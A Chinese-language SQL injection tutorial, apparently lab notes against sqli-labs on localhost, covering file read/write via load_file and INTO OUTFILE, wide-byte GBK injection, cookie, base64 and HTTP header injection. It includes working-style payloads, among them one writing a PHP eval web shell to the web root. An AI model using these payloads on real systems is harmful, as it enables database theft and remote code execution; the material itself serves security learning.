一、SQL 注入文件读写
1.1 前提条件
我们也可以利用 SQL 注入漏洞读写文件。但是读写文件需要一定的条件。
1、secure-file-priv
可以再 phpmyadmin 中查看该变量,该参数在高版本的 mysql 数据库中限制了文件的导入
导出。
改参数可以写在 my.ini 配置文件中[mysqld]下。若要配置此参数,需要修改 my.ini 配置文
件,并重启 mysql 服务。
打开 D:\phpStudy\MySQL\my.ini 配置文件,在[mysqld]下添加 secure-file-priv
关于该参数的相关说明
2、当前用户具有文件权限
查询语句 select File_priv from mysql.user where user=“root” and host=“localhost”
3、知道要写入目标文件的绝对路径
1.2 读取文件操作
[… union select 1,load_file(‘C:\Windows\System32\drivers\etc\hosts’),3 --+]
使用 load_file(’’)函数
注意:在 windows 系统中,两种路径都可以
C:\Windows\System32\drivers\etc\hosts
C:/Windows/System32/drivers/etc/hosts
1.3 写入文件操作
[?id=-33 union select 1,’<?php phpinfo();?>’,3 into outfile ‘c:\phpstudy\www\1.php’ ]
[?id=-33 union select 1,’<?php @eval($_REQUESTS[777]);?>’,3 into outfile
‘c:\phpstudy\www\2.php’ ]
如果页面不报错,说明写入成功。可以直接访问写入文件[http://localhost/1.php]
二、宽字节注入
我们通过 sqli-labs 第 32 关来测试
使用[?id=1],页面有回显,使用联合注入查询
使用[?id=1’]测试的时候,会发现单引号被[]转移
测试网站的编码是 GBK 编码,其采用双字节编码范围,GBK 的编码范围,8140-FEFE(高
字节从 81 到 FE,低字节从 40 到 FE)
我们可以在单引号之前提交一个十六进制的字符,与 5c(也就是字符\)组成以一个 GBK 编
码的汉字。这样 SQL 语句传入数据库的时候,转移字符 5c ,会被看作 GBK 汉字的低字节
位,从而失去转义的作用。
如果我们提交[?id=1000%df’ union select 1,2,3–+],就可以使用联合查询注入了。
不仅仅是[df],在高字节范围之内的都可以
0xdf5c 就是一个汉字“運”
三、Cookie 注入
我们使用 sqli-labs 第 20 关来说明 Cookie 注入的问题
Cookie 注入的注入参数需要通过 Cookie 提交,可以通过[document.cookie],在控制台完成
对浏览器 Cookie 的读写。
在控制台输入,然后刷新页面
document.cookie=“uname =Dumb’ and extractvalue(1,concat(0x7e,database(),0x7e))#”
在 bp 中提交
这里必须用#或者-- (–空格)注释,不能用–+注释。
四、base64 注入
我们以 sqli-labs 第 22 关来说明 base64 注入的问题。
发现页面报时区错误,解决方法,修改 php.ini 文件。
base 注入 就是将注入的字段经过 base64 编码,发现 22 关是输入 Cookie 型的 base64 注
入,使用报错注入手法
uname =Dumb" and updatexml(1,concat(0x5e,version(),0x5e),1)#
base64 编码之后:
RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDVlLHZlcnNpb24oKSwweDVlKSwxKS
M=
五、HTTP 头部注入
http 头部注入就是指注入字段在 HTTP 头部的字段中,这些字段通常有 User-Agent、Referer
等。
1、User-Agent 注入
如 sqli-labs 第 18 关
payload
[User-Agent:hacker’ and updatexml(1,concat(0xx5e,version(),0x5e),1) and ‘1’='1]
2、Referer 注入
第 19 关,注入字段在 Referer 中
[hacker’ and updatexml(1,concat(0x5e,version(),0x5e),1) and ‘1’='1]